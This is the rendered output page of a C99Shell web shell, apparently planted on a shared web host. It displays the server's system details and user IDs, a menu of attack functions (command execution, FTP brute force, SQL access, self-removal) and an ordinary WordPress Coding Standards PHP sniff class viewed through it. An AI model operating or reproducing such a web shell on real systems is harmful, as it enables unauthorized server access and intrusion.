!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/local/wp/vendor/wp-coding-standards/wpcs/WordPress/   drwxr-xr-x
Free 714.25 GB of 879.6 GB (81.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AbstractFunctionParameterSniff.php (5.92 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * WordPress Coding Standard.
 *
 * @package WPCS\WordPressCodingStandards
 * @link    https://github.com/WordPress/WordPress-Coding-Standards
 * @license https://opensource.org/licenses/MIT MIT
 */

namespace WordPressCS\WordPress;

use PHP_CodeSniffer\Util\Tokens;
use PHPCSUtils\Utils\PassedParameters;
use WordPressCS\WordPress\AbstractFunctionRestrictionsSniff;

/**
 * Advises about parameters used in function calls.
 *
 * @since 0.11.0
 */
abstract class AbstractFunctionParameterSniff extends AbstractFunctionRestrictionsSniff {

    /**
     * The group name for this group of functions.
     *
     * Intended to be overruled in the child class.
     *
     * @var string
     */
    protected $group_name = 'restricted_parameters';

    /**
     * Functions this sniff is looking for. Should be defined in the child class.
     *
     * @var array<string, mixed> The only requirement for this array is that the top level
     *                           array keys are the names of the functions you're looking for.
     *                           Other than that, the array can have arbitrary content
     *                           depending on your needs.
     */
    protected $target_functions = array();

    /**
     * Groups of functions to restrict.
     *
     * @return array<string, array<string, array<string>>>
     */
    public function getGroups() {
        if ( empty( $this->target_functions ) ) {
            return array();
        }

        return array(
            $this->group_name => array(
                'functions' => array_keys( $this->target_functions ),
            ),
        );
    }

    /**
     * Process a matched token.
     *
     * @param int    $stackPtr        The position of the current token in the stack.
     * @param string $group_name      The name of the group which was matched.
     * @param string $matched_content The token content (function name) which was matched
     *                                in lowercase.
     *
     * @return int|void Integer stack pointer to skip forward or void to continue
     *                  normal file processing.
     */
    public function process_matched_token( $stackPtr, $group_name, $matched_content ) {

        $parameters = PassedParameters::getParameters( $this->phpcsFile, $stackPtr );

        if ( empty( $parameters ) ) {
            /*
             * Check if this is a first class callable.
             *
             * No need for extensive defensive coding as the `is_targetted_token()` method has already
             * validated the open and close parentheses exist.
             */
            $openParens    = $this->phpcsFile->findNext( Tokens::$emptyTokens, ( $stackPtr + 1 ), null, true );
            $firstNonEmpty = $this->phpcsFile->findNext( Tokens::$emptyTokens, ( $openParens + 1 ), null, true );
            if ( \T_ELLIPSIS === $this->tokens[ $firstNonEmpty ]['code'] ) {
                return $this->process_first_class_callable( $stackPtr, $group_name, $matched_content );
            } else {
                return $this->process_no_parameters( $stackPtr, $group_name, $matched_content );
            }
        } else {
            return $this->process_parameters( $stackPtr, $group_name, $matched_content, $parameters );
        }
    }

    /**
     * Verify if the current token is a function call. Behaves like the parent method, except that
     * it returns false if there is no opening parenthesis after the function name (likely a
     * function import) or if it is a first class callable.
     *
     * @param int $stackPtr The position of the current token in the stack.
     *
     * @return bool
     */
    public function is_targetted_token( $stackPtr ) {
        if ( ! parent::is_targetted_token( $stackPtr ) ) {
            return false;
        }

        $next = $this->phpcsFile->findNext( Tokens::$emptyTokens, ( $stackPtr + 1 ), null, true );

        if ( \T_OPEN_PARENTHESIS !== $this->tokens[ $next ]['code'] ) {
            // Not a function call (likely a function import).
            return false;
        }

        if ( isset( $this->tokens[ $next ]['parenthesis_closer'] ) === false ) {
            // Syntax error or live coding: missing closing parenthesis.
            return false;
        }

        return true;
    }

    /**
     * Process the parameters of a matched function.
     *
     * This method has to be made concrete in child classes.
     *
     * @param int    $stackPtr        The position of the current token in the stack.
     * @param string $group_name      The name of the group which was matched.
     * @param string $matched_content The token content (function name) which was matched
     *                                in lowercase.
     * @param array  $parameters      Array with information about the parameters.
     *
     * @return int|void Integer stack pointer to skip forward or void to continue
     *                  normal file processing.
     */
    abstract public function process_parameters( $stackPtr, $group_name, $matched_content, $parameters );

    /**
     * Process the function if no parameters were found.
     *
     * Defaults to doing nothing. Can be overloaded in child classes to handle functions
     * were parameters are expected, but none found.
     *
     * @param int    $stackPtr        The position of the current token in the stack.
     * @param string $group_name      The name of the group which was matched.
     * @param string $matched_content The token content (function name) which was matched
     *                                in lowercase.
     *
     * @return int|void Integer stack pointer to skip forward or void to continue
     *                  normal file processing.
     */
    public function process_no_parameters( $stackPtr, $group_name, $matched_content ) {}

    /**
     * Process the function if it is used as a first class callable.
     *
     * Defaults to doing nothing. Can be overloaded in child classes to implement specific checks
     * on first class callable use of the function.
     *
     * @param int    $stackPtr        The position of the current token in the stack.
     * @param string $group_name      The name of the group which was matched.
     * @param string $matched_content The token content (function name) which was matched
     *                                in lowercase.
     *
     * @return int|void Integer stack pointer to skip forward or void to continue
     *                  normal file processing.
     */
    public function process_first_class_callable( $stackPtr, $group_name, $matched_content ) {}
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0575 ]--